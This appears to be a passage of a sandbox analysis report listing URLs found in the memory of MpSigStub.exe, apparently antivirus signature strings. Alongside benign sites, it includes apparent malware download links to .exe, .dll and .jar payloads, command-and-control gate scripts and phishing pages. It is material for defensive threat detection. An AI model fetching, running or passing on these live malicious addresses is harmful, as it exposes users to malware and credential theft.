Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	String found in binary or memory: http://finanzen-netto.de
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://find.verycd.com/folders?cat=movie&kw=%s
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://finder.strangled.net/?pubid=
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://fineartconsult.be/gallery/index.php?email=
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://firefoxstabs.com/
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	String found in binary or memory: http://firestweb.com/loja/social/1.jpg
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	String found in binary or memory: http://firestweb.com/loja/social/2.jpg
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	String found in binary or memory: http://firestweb.com/loja/social/3.jpg
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: http://fixdoctorsfirst.net/registry/andyfkz.png?bg=sp14
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: http://flash.chinaren.com/ip/ip.php
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: http://flashupd.com/mp3/in
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://florida-pawn.com?
Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp	String found in binary or memory: http://flow4.6299.cc/ClientAPI/flowtaskAPI.aspx
Source: MpSigStub.exe, 00000023.00000003.6290146708.0000028BD5FA2000.00000004.00000001.sdmp	String found in binary or memory: http://fmforums.com/wggx991264/
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://foo.w97.cn/SoftInterFace/SearchNum.aspx
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://foo.w97.cn/data/file/kwbuf.ini
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	String found in binary or memory: http://forms.newlifeadmin.org
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: http://fortisdesigns.com/5ox6oyzzslcp
Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	String found in binary or memory: http://foundation.shanto-mariamfoundation.org/24.gif
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://foxxpriv.ru/pic1/index.php
Source: MpSigStub.exe, 00000023.00000003.6267617568.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://frame.crazywinnings.com/scripts/protect.php?promo
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://freedomtonurse.net?
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://freeholdsurgical.net?
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://freeholdsurgical.org?
Source: MpSigStub.exe, 00000023.00000003.6335572342.0000028BD6FAA000.00000004.00000001.sdmp	String found in binary or memory: http://freeimagehost.ru/ubanner.png
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: http://freeunweb.pro/FreeUnWeb.exe
Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp	String found in binary or memory: http://freevideoz.info/
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://freight.eu.com/download
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://fu.o3sb.com:9999/img.jpg
Source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp	String found in binary or memory: http://funsiteshere.com/
Source: MpSigStub.exe, 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp	String found in binary or memory: http://funsiteshere.com/redir.php
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://futebolclubesantacruz.com.br/
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://futureweighed.ae.am/showthread.php?t=731756
Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmp	String found in binary or memory: http://g.delyemo.ru
Source: MpSigStub.exe, 00000023.00000003.6306362414.0000028BD740C000.00000004.00000001.sdmp	String found in binary or memory: http://g1.globo.com/Noticias/SaoPaulo/0
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://gahtt9j6.u8f3e5jq.ru
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://gaigoixxx.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	String found in binary or memory: http://galinasergeeva.ru
Source: MpSigStub.exe, 00000023.00000003.6339668679.0000028BD61EC000.00000004.00000001.sdmp	String found in binary or memory: http://galleries.payserve.com/1/31952/1
Source: MpSigStub.exe, 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmp	String found in binary or memory: http://gallerydating.net
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://gallolitaadultmove.com/pc/page/set_reg.php?code=&cuid=
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://gameroominc.com/
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://games.enet.com.cn/article/SearchCategory.php?key=%s
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://garlic10.grey.ero0101.com/set_inf.php?id=ero257.wmv&cid=
Source: MpSigStub.exe, 00000023.00000003.6341569052.0000028BD6C4E000.00000004.00000001.sdmp	String found in binary or memory: http://gathome.com/cgi-bin/first.pl
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://gd-sirve.com/rb.txt
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://gdcbmuveqjsli57x.onion/b93cf40ee63ed066
Source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmp	String found in binary or memory: http://ge.tt/api/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://geezybeatz.com/secured/index.html)
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://geocities.com/jobreee/main.htm
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://geocities.yahoo.com.br/youtoba03/listaaut.jpg
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	String found in binary or memory: http://get.file136desktop.info/DownloadManager/Get?p=638x
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: http://getfreez.net/multi-codec-pack.php
Source: MpSigStub.exe, 00000023.00000003.6279385939.0000028BD6BD6000.00000004.00000001.sdmp	String found in binary or memory: http://getmethere.ws
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://getp.jujutang.com
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: http://getsuperstuff.com
Source: MpSigStub.exe, 00000023.00000003.6278531314.0000028BD61AB000.00000004.00000001.sdmp	String found in binary or memory: http://getsyncer5.info/sync/?ext=bcool&pid=26&country=us
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://getvolkerdns.co.cc/priv8
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://getwebcake.com/Privacy
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: http://getyouneed.co
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: http://getyouneed.coa
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://getyouneed.com
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: http://getyouneed.com/r.php?wm=5
Source: MpSigStub.exe, 00000023.00000003.6339389691.0000028BD7F38000.00000004.00000001.sdmp	String found in binary or memory: http://gg.pw
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: http://ghsinternationalconferencewithinternationalfilesecureserviceglo.ydns.eu
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://ghthf.cf/cert/
Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	String found in binary or memory: http://gicia.info/cd/cd.php?id=%s&ver=g
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://gidstaxi.nl/mrszheuhe/8888888.png
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://ginger90.ivory.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://girlongirllibido.info/show.php?s=c366aa9358
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://gistsdey.com/wp-content/
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://gkfaalkhnkqvgjntywc.ml/liverpool-fc-news/features/
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://globalsoftbd.com/votre_agence-lcl.php
Source: MpSigStub.exe, 00000023.00000003.6306362414.0000028BD740C000.00000004.00000001.sdmp	String found in binary or memory: http://globonoticia.iitalia.com/noticia.com
Source: MpSigStub.exe, 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp	String found in binary or memory: http://go.58.com/?f=
Source: MpSigStub.exe, 00000023.00000003.6339389691.0000028BD7F38000.00000004.00000001.sdmp	String found in binary or memory: http://go.jetswap.com/ssflang.php?it=4893473
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://go.secureclick6.com/0534
Source: MpSigStub.exe, 00000023.00000003.6269231712.0000028BC3EF4000.00000004.00000001.sdmp	String found in binary or memory: http://go.winantivirus.com
Source: MpSigStub.exe, 00000023.00000003.6269231712.0000028BC3EF4000.00000004.00000001.sdmp	String found in binary or memory: http://go.winantivirus.comx
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: http://goatse.ragingfist.net/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://gogglgdoc.com/document/review/index.html)
Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp	String found in binary or memory: http://gogo.ru/go?x;
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://golden-toto.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/
Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/0ma6okopenhttp://goo.gl/0ma6okerror
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/9mrcts
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/bw14po
Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/x7a4lcshowwebinpopuptaskkill-f-im
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: http://google.com
Source: MpSigStub.exe, 00000023.00000003.6288865020.0000028BD7BC8000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6306325098.0000028BD73CA000.00000004.00000001.sdmp	String found in binary or memory: http://google.com/
Source: MpSigStub.exe, 00000023.00000003.6288865020.0000028BD7BC8000.00000004.00000001.sdmp	String found in binary or memory: http://google.com/ID
Source: MpSigStub.exe, 00000023.00000003.6310448430.0000028BD6169000.00000004.00000001.sdmp	String found in binary or memory: http://google.com/install.php?time=%d
Source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6308145032.0000028BD716C000.00000004.00000001.sdmp	String found in binary or memory: http://google.ru/js
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://gosgd.com
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://gosgd2.com
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://gpt.alarmasystems.ru/wp-content/upgrade/obi.html
Source: MpSigStub.exe, 00000023.00000003.6295487239.0000028BD661C000.00000004.00000001.sdmp	String found in binary or memory: http://gracefullifetime.com/yqagtiljgk/530340.png
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: http://grandsteel.kz/stats.php
Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	String found in binary or memory: http://granitmdp.com/rechnung-nr-06197/
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://grape53.olive.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://greenertrack.info/.well-known/acme-challenge/hp.gf
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: http://greenthdykegheedahatakankeadeshnaathfgh.ydns.eu/office360/regasm.exe
Source: MpSigStub.exe, 00000023.00000003.6318934861.0000028BD62E5000.00000004.00000001.sdmp	String found in binary or memory: http://greentreee.com/src/gate.php?a
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: http://gridinsoft.com/check_ver.php?product=chmeditor&ver=
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://grizzli-counter.com/id120/index.php
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.bluechipstaffing.com/
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.chromaimagen.com/
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.couturefloor.com/
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.ddoborguild.com/0n1ine.exe
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.dondyablo.com/
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.echowin.com/autorizz0.exe
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.globaltcms.com/autorizz0.exe
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.hamiltoncustomhomesinc.com/
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.llbntv.com/pagament1.exe
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.llbntv.org/pagament1.exe
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.securitiessupportunit.com/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://guineapig.tips/co
Source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://gveejlsffxmfjlswjmfm.com/files/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://gweboffice.co.uk/
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://gx3bxpo.sed.digitalmusictutorials.com
Source: MpSigStub.exe, 00000023.00000003.6318934861.0000028BD62E5000.00000004.00000001.sdmp	String found in binary or memory: http://gyeuiojndhbvmaoiwnnchauwo28vnj8mjmvnwhk.ydns.eu/document.doc
Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	String found in binary or memory: http://h1m2en.ddns.net/sa98as8f7/kk/1445785485
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://hackbox.f3322.org:808/Consys21.dll
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://handjobheats.com/xgi-bin/q.php
Source: MpSigStub.exe, 00000023.00000003.6305976502.0000028BD7388000.00000004.00000001.sdmp	String found in binary or memory: http://hao.360.cn
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: http://hao.360.cn/?src=lm&
Source: MpSigStub.exe, 00000023.00000003.6305976502.0000028BD7388000.00000004.00000001.sdmp	String found in binary or memory: http://hao.360.cnx
Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp	String found in binary or memory: http://happy-fxs.com/sms/
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://harpa.space/kgodu.dot
Source: MpSigStub.exe, 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmp	String found in binary or memory: http://hasvideo.net
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: http://hasvideo.net?t=
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: http://hellos.tcp4.me/standard-bank-online-relief-funds-ucount-onlinebanking.standardbank.co.za-dire
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://helpefy.com/002/777/new%20outlook/new%20outlook/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://helpservice09.hol.es
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	String found in binary or memory: http://hem1.passagen.se/fylke/
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	String found in binary or memory: http://hgastation.com
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://hi.ru/?44
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: http://highnmightytv.com/orderss182doc.php
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://highnmightytv.com/wp-content/themes/data.php
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://highpay.website/css/windows.jar
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://hikangaroo5.com/images/xjs7s/gb40f_eygecpdogfzeca1xtg/ruryf1?sxps=vddxqzhm_&oof=xptbdzfnuzvdt
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://hiltrox.com
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://hit1.marinalvapn.com/silage.zip
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://hnigrp.com?
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://hniltd.com?
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://hnimanagement.com?
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://hnimgmt.com?
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://hnimgt.com?
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://ho.io/
Source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp	String found in binary or memory: http://hohosearch.com/?uid=1234#red=
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://hollywood-pawn.com?
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://hollywoodnailspa.net/auth/tb/tb/index.html)
Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	String found in binary or memory: http://hombresvalientesposadas.com/paya/reportdhlnew2.php
Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	String found in binary or memory: http://hombresvalientesposadas.com/zek/reportdhlnew2.php
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://home.zh-cn.cc/
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: http://hookbase.com/Index.htm
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://host87.net
Source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmp	String found in binary or memory: http://hostserver.kr
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://hostthenpost.org/uploads/
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: http://hotbar.com
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: http://hotedeals.co.uk/ekck095032/
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: http://houusha33.icu/jquery/jquery.php
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://hpg.se/tmp/lns.txt
Source: MpSigStub.exe, 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmp	String found in binary or memory: http://hqdating.net
Source: MpSigStub.exe, 00000023.00000003.6335572342.0000028BD6FAA000.00000004.00000001.sdmp	String found in binary or memory: http://hqsextube08.com/getsoft/task.php?v=
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://html.hjsm.tom.com/?mod=book&act=anonsearch&key=%s
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://htmlcss.3322.org/sub/ray.js
Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://http://silver13.net/
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://httpz.ru
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://huaned.net/?683228460
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://hvln.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	String found in binary or memory: http://hyoeyeep.ws/template.doc
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://hytechmart.com
Source: MpSigStub.exe, 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp	String found in binary or memory: http://i.compucrush.com/i.php
Source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp	String found in binary or memory: http://i.compucrush.com/i.phpxD
Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	String found in binary or memory: http://i.imgur.com/
Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmp	String found in binary or memory: http://i.omeljs.info/omel/javascript.js?appTitle=PennyBee&channel=chkomel
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://i.sfu.edu.ph/ds/161120.gif
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	String found in binary or memory: http://i.ttd7.cn/getsoft
Source: MpSigStub.exe, 00000023.00000003.6335572342.0000028BD6FAA000.00000004.00000001.sdmp	String found in binary or memory: http://iaa.1eko.com/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://ianlunn.co.uk
Source: MpSigStub.exe, 00000023.00000003.6343112775.0000028BD6735000.00000004.00000001.sdmp	String found in binary or memory: http://ibm.dmcast.com/t.rar
Source: MpSigStub.exe, 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmp	String found in binary or memory: http://ibrahimovich.banouta.net/a
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: http://icanhazip.com
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://icloudstorage.moonfruit.com/?preview=y
Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmp	String found in binary or memory: http://idea-secure-login.com/3/ddg.dll5
